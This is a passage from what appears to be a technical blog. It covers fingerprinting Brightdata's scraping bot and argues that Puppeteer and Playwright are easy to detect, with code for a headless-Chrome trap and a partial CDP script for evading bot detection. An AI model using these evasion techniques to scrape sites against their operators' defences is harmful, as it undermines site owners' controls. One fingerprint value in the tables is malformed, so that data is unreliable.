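  for (const p of PROPS) windowNav[p] = navigator[p];
  return findMismatches(windowNav, await collectWorkerNavigator());
}
```

<p>On a page, <code>detectNavigatorSpoofing().then(console.log)</code> would log the names of the inconsistent properties. For the sample above, I would expect <code>platform</code> and <code>languages</code> to show up.</p>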
<h1>Testing with pixelscan.net</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/pixelscan">is a link</a> to the <a href="https://pixelscan.net/">pixelscan.net</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://pixelscan.net/'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#doesNOtExit'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">})</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<h1>Testing with f.vision</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/f.vision">is a link</a> to the <a href="http://f.vision/">f.vision</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'http://f.vision'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">60000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#start-button > span'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#start-button > span'</span><span class="p">);</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#collapse-buttons > button.btn.btn-outline.btn-primary.expand-all'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">60000</span><span class="p">})</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#collapse-buttons > button.btn.btn-outline.btn-primary.expand-all'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<h4>Result 1: Fake Canvas detected in Data Collector bot</h4>
<p>The <a href="http://f.vision">f.vision</a> detection site claims to have detected a fake canvas in <a href="https://brightdata.com/products/data-collector">Brightdata data collector</a>.</p>
<figure>
<img src="https://incolumitas.com/images/fakeCanvas.png" alt="Detected fake canvas" />
<figcaption>Detected fake canvas</figcaption>
</figure>
<p>When expanding the information for <em>fake canvas</em>, <a href="http://f.vision">f.vision</a> tells me:</p>
<figure>
<img src="https://incolumitas.com/images/fakeCanvasInfo.png" alt="Detected fake canvas" />
<figcaption>More Information on fake canvas</figcaption>
</figure>
<p>It seems that those fake canvas detection tests originate from <a href="https://github.com/kkapsner/CanvasBlocker/issues/287">here</a>. The original test site is named <a href="https://canvasblocker.kkapsner.de/test/webGL-Test.html">webGL-Test</a>.</p>
<p>The author states in this GitHub issue:</p>
<blockquote>
<p>As you already found out the "fake input" mode prevents the detection of normal canvas. For WebGL I'm not aware of any (reasonable) way to prevent the detection there (actually I also have a detection page for webGL: https://canvasblocker.kkapsner.de/test/webGL-Test.html)</p>
</blockquote>
<p>I won't reproduce the test here, but I am quite confident that this finding is correct and that the bot spoofs different values for WebGL functionality.</p>
<h4>Result 2: Various Browser Fingerprints are Static across Bot Samples</h4>
<p>The bot detection site <a href="http://f.vision/">f.vision</a> computes a number of useful browser fingerprints. For that reason, I will test whether it is possible to detect
<a href="https://brightdata.com/products/data-collector">Brightdata's bot</a> with those fingerprints. Detection is possible if the following two properties hold:</p>
<ol>
<li>The fingerprints stay the same among many independent bot samples</li>
<li>Those fingerprints together have enough entropy so you can uniquely identify the bot among thousands of normal visitors</li>
</ol>
<table>
<thead>
<tr>
<th>#</th>
<th>HSTS</th>
<th>WEBGL</th>
<th>CANVAS</th>
<th>PLUGINS</th>
<th>AUDIO</th>
<th>CLIENT RECTS</th>
<th>FONTS</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>N/A</td>
<td>d0ae1aeb6476af3f</td>
<td>2140246792</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>8dc9258100071ba8</td>
</tr>
<tr>
<td>2</td>
<td>cc832e</td>
<td>d0ae1aeb6476af3f</td>
<td>1470235470</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>3</td>
<td>cc832e</td>
<td>d0ae1aeb6476af3f</td>
<td>1470235470</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>4</td>
<td>b8c752</td>
<td>d0ae1aeb6476af3f</td>
<td>-2125110224</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>023e4ca61828dfc7</td>
</tr>
<tr>
<td>5</td>
<td>94832d</td>
<td>d0ae1aeb6476af3f</td>
<td>-198118648</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>064d6b2722232577</td>
</tr>
<tr>
<td>6</td>
<td>1c7937</td>
<td>d0ae1aeb6476af3f</td>
<td>1426403692</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>7</td>
<td>dca0b6</td>
<td>d0ae1aeb6476af3f</td>
<td>-579119140</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>8</td>
<td>fd36e9</td>
<td>d0ae1aeb6476af3f</td>
<td>271321058</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>2aaf3ba9b5696cec</td>
</tr>
<tr>
<td>9</td>
<td>69116b</td>
<td>d0ae1aeb6476af3f</td>
<td>-2097547378</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>c01b66fbb94df014</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
</tbody>
</table>
<p>As you can see from the nine <a href="https://brightdata.com/products/data-collector">Brightdata bot</a> samples collected, the fingerprints for WEBGL, PLUGINS, AUDIO and CLIENT RECTS stay the same across all bot visits. The big question: How much entropy do those fingerprints have? Is it possible to uniquely identify a <a href="https://brightdata.com/products/data-collector">Brightdata data collector bot</a> with those fingerprints?</p>
<p>We can quickly test the entropy of the fingerprint data above by collecting samples with real devices.</p>
<p>The fingerprints below are taken with four different real devices when visiting <a href="http://f.vision/">f.vision</a>:</p>
<ol>
<li>With my laptop, Linux with Chrome</li>
<li>With my Android mobile phone with Firefox</li>
<li>With <a href="https://www.browserstack.com/">browserstack.com real device</a> OSX Big Sur with Chrome 91</li>
<li>With <a href="https://www.browserstack.com/">browserstack.com real device</a> Win10 with Chrome 91</li>
</ol>
<table>
<thead>
<tr>
<th>Device</th>
<th>HSTS</th>
<th>WEBGL</th>
<th>CANVAS</th>
<th>PLUGINS</th>
<th>AUDIO</th>
<th>CLIENT RECTS</th>
<th>FONTS</th>
</tr>
</thead>
<tbody>
<tr>
<td>Linux with Chrome</td>
<td>420525</td>
<td>ab4364d46077693b</td>
<td>-31304244</td>
<td>cb43bb325b87c16f</td>
<td>19f2ec826da99435</td>
<td>ee5b6ada17b403ef</td>
<td>af1e3afb793f6d87</td>
</tr>
<tr>
<td>Android with Firefox</td>
<td>40b4f1</td>
<td>19208ef875544de3</td>
<td>1250865652</td>
<td>N/A</td>
<td>41efd79c6069738c</td>
<td>4612193a6e9f936b</td>
<td>da39a3ee5e6b4b0d</td>
</tr>
<tr>
<td>OSX Big Sur with Chrome 91</td>
<td>1d26d5</td>
<td>2def3b550c3e950d</td>
<td>-434613739</td>
<td>f98ba1457738b341</td>
<td>d263e57872d8cbf0</td>
<td>09b8cf131bb1dacc</td>
<td>a5103579b5284324</td>
</tr>
<tr>
<td>Win10 with Chrome 91</td>
<td>356893</td>
<td>d0ae1aeb6476af3f</td>
<td>-17f22f0632</td>
<td>f98ba1457738b341</td>
<td>19f2ec826da99435</td>
<td>09b8cf131bb1dacc</td>
<td>a267018f11767e47</td>
</tr>
</tbody>
</table>
<p>Now let's check if the fingerprints WEBGL, PLUGINS, AUDIO and CLIENT RECTS have enough entropy.</p>
<p>I can disregard the WEBGL fingerprint as low entropy, because Win10 with Chrome has the same value as the bot (<code>d0ae1aeb6476af3f</code>).</p>
<p>Same applies to the PLUGINS fingerprint, because <code>f98ba1457738b341</code> appears also in OSX Big Sur with Chrome 91 and Win10 with Chrome 91.</p>
<p>Same story with AUDIO fingerprint. <code>19f2ec826da99435</code> occurs in Linux with Chrome and in Win10 with Chrome 91.</p>
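<p>CLIENT RECTS also seems to have low entropy, because both OSX Big Sur with Chrome 91 and Win10 with Chrome 91 share the value <code>09b8cf131bb1dacc</code>. Note, however, that the bot's own value <code>c01b66fbb94df014</code> does not appear on any of the four real devices.</p>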
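<p>The comparison above can also be done mechanically. The following is a minimal sketch, not part of the original measurements: the values are copied from the two tables, and the helper name <code>collisionsWithRealDevices</code> is made up for illustration. For each fingerprint that is static across the bot samples, it lists the real devices that produce the same value.</p>

```javascript
// Fingerprints that are identical in all nine bot samples (see first table).
// HSTS, CANVAS and FONTS are left out because they vary between bot visits.
const botSamples = Array.from({ length: 9 }, () => ({
  WEBGL: 'd0ae1aeb6476af3f',
  PLUGINS: 'f98ba1457738b341',
  AUDIO: '19f2ec826da99435',
  CLIENT_RECTS: 'c01b66fbb94df014',
}));

// The same four fingerprints for the real devices (see second table).
const realDevices = {
  'Linux with Chrome': { WEBGL: 'ab4364d46077693b', PLUGINS: 'cb43bb325b87c16f', AUDIO: '19f2ec826da99435', CLIENT_RECTS: 'ee5b6ada17b403ef' },
  'Android with Firefox': { WEBGL: '19208ef875544de3', PLUGINS: 'N/A', AUDIO: '41efd79c6069738c', CLIENT_RECTS: '4612193a6e9f936b' },
  'OSX Big Sur with Chrome 91': { WEBGL: '2def3b550c3e950d', PLUGINS: 'f98ba1457738b341', AUDIO: 'd263e57872d8cbf0', CLIENT_RECTS: '09b8cf131bb1dacc' },
  'Win10 with Chrome 91': { WEBGL: 'd0ae1aeb6476af3f', PLUGINS: 'f98ba1457738b341', AUDIO: '19f2ec826da99435', CLIENT_RECTS: '09b8cf131bb1dacc' },
};

// For every fingerprint that is constant across all bot samples, list the
// real devices that report exactly the same value.
function collisionsWithRealDevices(samples, devices) {
  const report = {};
  for (const key of Object.keys(samples[0])) {
    const values = new Set(samples.map((sample) => sample[key]));
    if (values.size !== 1) continue; // not static across bot visits
    const [botValue] = values;
    report[key] = Object.keys(devices).filter((name) => devices[name][key] === botValue);
  }
  return report;
}

console.log(collisionsWithRealDevices(botSamples, realDevices));
```

<p>With this data, WEBGL, PLUGINS and AUDIO each collide with at least one real device, while the bot's CLIENT RECTS value collides with none. Four real devices are of course far too few to draw a conclusion about entropy in either direction.</p>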
<p><strong>Conclusion:</strong> Fingerprinting for <a href="https://brightdata.com/products/data-collector">Brightdata's bot</a> will not be straightforward with <a href="http://f.vision/">f.vision</a> fingerprints.</p>Avoid Puppeteer or Playwright for Web Scraping2021-05-20T22:26:00+02:002021-05-25T14:50:00+02:00Nikolai Tschachertag:incolumitas.com,2021-05-20:/2021/05/20/avoid-puppeteer-and-playwright-for-scraping/<p>In this blog post I explain why it is best to avoid puppeteer and playwright for web scraping.</p><p><a class="btn" href="https://github.com/NikolaiT/stealthy-scraping-tools" style="padding: 10px; font-weight: 600; font-size: 15px;">Stealthy-scraping-tools repo on GitHub</a></p>
<h2>Introduction</h2>
<p>I don't recommend using Puppeteer or Playwright for web scraping.</p>
<p>The reasons are simple:</p>
<ol>
<li>Both libraries ship their own Chromium binaries, which ordinary Internet users do not use for normal web browsing. For example, the current <code>puppeteer@v9.0.0</code> release uses the Chromium version <code>Chromium 91.0.4469.0 (r869685)</code>. I doubt that this exact build is used by a substantial share of Internet users for their everyday browsing.</li>
<li>It is possible to detect that a browser is automated by those libraries based on many different behaviors that are unique to puppeteer or playwright.</li>
<li>Puppeteer/Playwright use Chromium, whereas most people use Google Chrome. There are only some <a href="https://chromium.googlesource.com/chromium/src/+/refs/heads/main/docs/chromium_browser_vs_google_chrome.md">minor differences</a> between those two browsers, but Chrome is used far more often than Chromium.</li>
</ol>
<p>For example, puppeteer uses a <a href="https://github.com/puppeteer/puppeteer/blob/d01aa6c84a1e41f15ffed3a8d36ad26a404a7187/src/node/Launcher.ts#L160">plethora of command line flags</a> that you normally would not use when you launch a browser:</p>
<div class="highlight"><pre><span></span><code><span class="nx">defaultArgs</span><span class="p">(</span><span class="nx">options</span><span class="o">:</span> <span class="nx">BrowserLaunchArgumentOptions</span> <span class="o">=</span> <span class="p">{})</span><span class="o">:</span> <span class="nx">string</span><span class="p">[]</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">chromeArguments</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--disable-background-networking'</span><span class="p">,</span>
<span class="s1">'--enable-features=NetworkService,NetworkServiceInProcess'</span><span class="p">,</span>
<span class="s1">'--disable-background-timer-throttling'</span><span class="p">,</span>
<span class="s1">'--disable-backgrounding-occluded-windows'</span><span class="p">,</span>
<span class="s1">'--disable-breakpad'</span><span class="p">,</span>
<span class="s1">'--disable-client-side-phishing-detection'</span><span class="p">,</span>
<span class="s1">'--disable-component-extensions-with-background-pages'</span><span class="p">,</span>
<span class="s1">'--disable-default-apps'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-extensions'</span><span class="p">,</span>
<span class="s1">'--disable-features=Translate'</span><span class="p">,</span>
<span class="s1">'--disable-hang-monitor'</span><span class="p">,</span>
<span class="s1">'--disable-ipc-flooding-protection'</span><span class="p">,</span>
<span class="s1">'--disable-popup-blocking'</span><span class="p">,</span>
<span class="s1">'--disable-prompt-on-repost'</span><span class="p">,</span>
<span class="s1">'--disable-renderer-backgrounding'</span><span class="p">,</span>
<span class="s1">'--disable-sync'</span><span class="p">,</span>
<span class="s1">'--force-color-profile=srgb'</span><span class="p">,</span>
<span class="s1">'--metrics-recording-only'</span><span class="p">,</span>
<span class="s1">'--no-first-run'</span><span class="p">,</span>
<span class="s1">'--enable-automation'</span><span class="p">,</span>
<span class="s1">'--password-store=basic'</span><span class="p">,</span>
<span class="s1">'--use-mock-keychain'</span><span class="p">,</span>
<span class="c1">// TODO(sadym): remove '--enable-blink-features=IdleDetection'</span>
<span class="c1">// once IdleDetection is turned on by default.</span>
<span class="s1">'--enable-blink-features=IdleDetection'</span><span class="p">,</span>
<span class="p">];</span>
<span class="kd">const</span> <span class="p">{</span>
<span class="nx">devtools</span> <span class="o">=</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">headless</span> <span class="o">=</span> <span class="o">!</span><span class="nx">devtools</span><span class="p">,</span>
<span class="nx">args</span> <span class="o">=</span> <span class="p">[],</span>
<span class="nx">userDataDir</span> <span class="o">=</span> <span class="kc">null</span><span class="p">,</span>
<span class="p">}</span> <span class="o">=</span> <span class="nx">options</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">userDataDir</span><span class="p">)</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="sb">`--user-data-dir=</span><span class="si">${</span><span class="nx">path</span><span class="p">.</span><span class="nx">resolve</span><span class="p">(</span><span class="nx">userDataDir</span><span class="p">)</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">devtools</span><span class="p">)</span> <span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--auto-open-devtools-for-tabs'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">headless</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--headless'</span><span class="p">,</span> <span class="s1">'--hide-scrollbars'</span><span class="p">,</span> <span class="s1">'--mute-audio'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">args</span><span class="p">.</span><span class="nx">every</span><span class="p">((</span><span class="nx">arg</span><span class="p">)</span> <span class="p">=></span> <span class="nx">arg</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="s1">'-'</span><span class="p">)))</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'about:blank'</span><span class="p">);</span>
<span class="nx">chromeArguments</span><span class="p">.</span><span class="nx">push</span><span class="p">(...</span><span class="nx">args</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">chromeArguments</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>But there is more. Every page created with <code>await browser.newPage()</code> carries some puppeteer/playwright specific properties on its DOM and window object that are easy to detect. The easiest to detect is probably <code>navigator.webdriver</code> (even though I am not sure if puppeteer still sets this).</p>
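<p>To make this more concrete, here is a minimal sketch of such a client-side check. The function name <code>automationSignals</code> is hypothetical, and the two checks are only the most basic ones: Chromium typically reports <code>navigator.webdriver === true</code> when it is launched with <code>--enable-automation</code>, and headless Chrome puts <code>HeadlessChrome</code> into its default user agent. Real detection scripts look at far more properties.</p>

```javascript
// Collect simple automation hints from a navigator-like object.
// In a real page you would call automationSignals(window.navigator).
function automationSignals(nav) {
  const signals = [];
  // Typically true when Chromium runs with --enable-automation.
  if (nav.webdriver === true) {
    signals.push('navigator.webdriver');
  }
  // Headless Chrome announces itself in its default user agent string.
  if (/HeadlessChrome/.test(nav.userAgent || '')) {
    signals.push('HeadlessChrome user agent');
  }
  return signals;
}

// Example with a hand-written object instead of a real browser navigator.
console.log(automationSignals({ webdriver: true, userAgent: 'Mozilla/5.0 HeadlessChrome/91.0.4469.0' }));
```

<p>An empty result does not prove that the visitor is human. It only means that these two particular hints are absent.</p>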
<p>But aren't there npm modules such as <a href="https://github.com/berstend/puppeteer-extra/tree/master/packages/puppeteer-extra-plugin-stealth">puppeteer-extra-plugin-stealth</a> that are specifically developed to hide the fact that puppeteer is used? </p>
<p>Yes, they exist, but their efficacy is very limited. It is just very hard to hide puppeteer/playwright once you use it.</p>
<p>And there is another reason why I suggest keeping the usage of the <a href="https://developer.chrome.com/docs/devtools/">Chrome DevTools</a> protocol as low as possible if you want to scrape undetected: Each command is sent over a WebSocket channel to the browser and a response is sent back. There is some inherent latency involved! I am not sure about it, but I assume that it must be possible to detect the usage of puppeteer functionality such as</p>
<ol>
<li><code>page.waitForSelector(selector[, options])</code> <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagewaitforselectorselector-options">Source</a></li>
<li><code>page.waitForNavigation([options])</code> <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagewaitfornavigationoptions">Source</a></li>
</ol>
<p>because bots usually perform <em>some action</em> right after a certain selector appears. Humans don't really care about XPath or CSS selectors.</p>
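<p>One way a detection script could exploit this is to compare the time at which an element appeared with the time at which it was clicked. The following is only a sketch of that idea under stated assumptions: the function name <code>looksScripted</code>, the input format and the 150 ms threshold are all made up for illustration and are not taken from any real detection product.</p>

```javascript
// Hypothetical threshold: reactions faster than this count as suspicious.
const MIN_HUMAN_REACTION_MS = 150;

// Each interaction holds two timestamps in milliseconds, for example taken
// with performance.now(): when the element was inserted into the DOM and
// when the visitor clicked it.
function looksScripted(interactions, minReactionMs = MIN_HUMAN_REACTION_MS) {
  if (interactions.length === 0) return false;
  const tooFast = interactions.filter(
    (interaction) => interaction.clickedAt - interaction.appearedAt < minReactionMs
  );
  // Flag only if most interactions are too fast, to tolerate one lucky click.
  return tooFast.length / interactions.length > 0.5;
}

// A visitor that clicks within a few milliseconds after each element appears.
console.log(looksScripted([
  { appearedAt: 0, clickedAt: 12 },
  { appearedAt: 1000, clickedAt: 1009 },
]));
```

<p>A scraper can of course defeat such a check by adding random delays, which is one more reason to think about timing at all.</p>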
<p>If you stroll through the <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md">puppeteer API page</a>, you also see <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/api.md#pagegotourl-options">stuff</a> such as:</p>
<blockquote>
<p>NOTE Headless mode doesn't support navigation to a PDF document. See the <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=761295">upstream issue</a>.</p>
</blockquote>
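<p>Another idea: Create a detection page that redirects the browser to a site serving a PDF document. If it cannot be delivered, the client might have been headless Chrome. Using express, such a headless Chrome trap could look like this:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fs'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'path'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/headlessTrap'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>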
<span class="c1">// sends http header: Location: /example.pdf</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">redirect</span><span class="p">(</span><span class="s1">'/example.pdf'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/example.pdf'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span><span class="nx">fs</span><span class="p">.</span><span class="nx">readFileSync</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="s1">'public/dummy.pdf'</span><span class="p">));</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">contentType</span><span class="p">(</span><span class="s2">"application/pdf"</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Refresh'</span><span class="p">,</span><span class="s1">'1; url=/goal'</span><span class="p">)</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">666</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">data</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// when reaching this, not a bot</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/goal'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'<html><body><h1>All GOOD</h1></body></html>'</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
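<p>The trap only becomes useful once the server evaluates which of the three routes a visitor actually requested. Here is a rough sketch of that evaluation, assuming a hypothetical per-session list of request paths (for example collected by an express middleware). The function name <code>trapVerdict</code> and the verdict strings are made up, and whether a visitor that never reaches <code>/goal</code> really is headless Chrome remains an untested hypothesis.</p>

```javascript
// paths: ordered list of request paths seen for one visitor session
// (hypothetical log format, not produced by the trap code itself).
function trapVerdict(paths) {
  if (!paths.includes('/headlessTrap')) return 'not tested';
  if (!paths.includes('/example.pdf')) return 'redirect not followed';
  // Only a client that rendered the PDF response follows the Refresh header.
  return paths.includes('/goal') ? 'reached goal' : 'stuck at PDF';
}

console.log(trapVerdict(['/headlessTrap', '/example.pdf', '/goal']));
console.log(trapVerdict(['/headlessTrap', '/example.pdf']));
```

<p>Sessions that end up as <code>stuck at PDF</code> would be the candidates for a closer look.</p>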
<h2>So what is the solution?</h2>
<p>The problem is that every scraping developer is either using puppeteer or playwright to create their bots. Therefore, all that the detectors have to do is to detect puppeteer or playwright - they don't have to detect bot-like behavior in general, it's enough to detect the standard browser automation framework.</p>
<p>My suggestion is: <strong>Ditch the browser automation frameworks altogether!</strong></p>
<p>Think about it: What do I really need for basic browser automation in order to scrape a website?</p>
<p>All that is required for robust browser automation is a straightforward way to find the coordinates for CSS selectors and a way to obtain the HTML code of the current website.</p>
<h3>Obtaining Coordinates for a CSS selector</h3>
<p>Put differently, we need a way to implement the following function:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="p">(</span><span class="nx">css_selector</span><span class="o">:</span> <span class="nx">string</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="nx">x</span><span class="o">:</span> <span class="nx">number</span><span class="p">,</span> <span class="nx">y</span><span class="o">:</span> <span class="nx">number</span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>All clicking, form filling, scrolling and other interaction is then done with desktop-level automation instead of puppeteer's <code>page.click()</code>, <code>page.type()</code> and so on.</p>
<p>We only require the <a href="https://chromedevtools.github.io/devtools-protocol/">CDP</a> to translate CSS selectors into coordinates. </p>
<p>That can be done with the help of the small CDP library <code>chrome-remote-interface</code>.</p>
<p>After saving the following script as <code>coords.js</code>, you may invoke it to obtain the absolute coordinates of any element by specifying a CSS selector.</p>
<p><code>node coords.js 'div'</code></p>
<div class="highlight"><pre><span></span><code><span class="c1">// coords.js</span>
<span class="kd">const</span> <span class="nx">CDP</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-remote-interface'</span><span class="p">);</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getCoords</span><span class="p">(</span><span class="nx">css_selector</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">client</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="c1">// connect to endpoint</span>
<span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">CDP</span><span class="p">();</span>
<span class="c1">// extract domains</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">Runtime</span><span class="p">}</span> <span class="o">=</span> <span class="nx">client</span><span class="p">;</span>
<span class="c1">// enable events then start!</span>
<span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">([</span><span class="nx">Runtime</span><span class="p">.</span><span class="nx">enable</span><span class="p">()]);</span>
<span class="c1">// get clientRect of links</span>
<span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">({</span>
<span class="nx">expression</span><span class="o">:</span> <span class="sb">`var targetCoordEl = document.querySelector('</span><span class="si">${</span><span class="nx">css_selector</span><span class="si">}</span><span class="sb">'); if (targetCoordEl) { JSON.stringify(targetCoordEl.getClientRects()); }`</span>
<span class="p">});</span>
<span class="c1">// get offset screen positioning</span>
<span class="kd">const</span> <span class="nx">screenPos</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">({</span>
<span class="nx">expression</span><span class="o">:</span> <span class="s2">"JSON.stringify({offsetY: window.screen.height - window.innerHeight, offsetX: window.screen.width - window.innerWidth})"</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">offset</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">screenPos</span><span class="p">.</span><span class="nx">result</span><span class="p">.</span><span class="nx">value</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">clientRect</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">clientRect</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nx">result</span><span class="p">.</span><span class="nx">value</span><span class="p">)[</span><span class="s2">"0"</span><span class="p">];</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">retVal</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">x</span><span class="o">:</span> <span class="nx">offset</span><span class="p">.</span><span class="nx">offsetX</span> <span class="o">+</span> <span class="nx">clientRect</span><span class="p">.</span><span class="nx">x</span><span class="p">,</span>
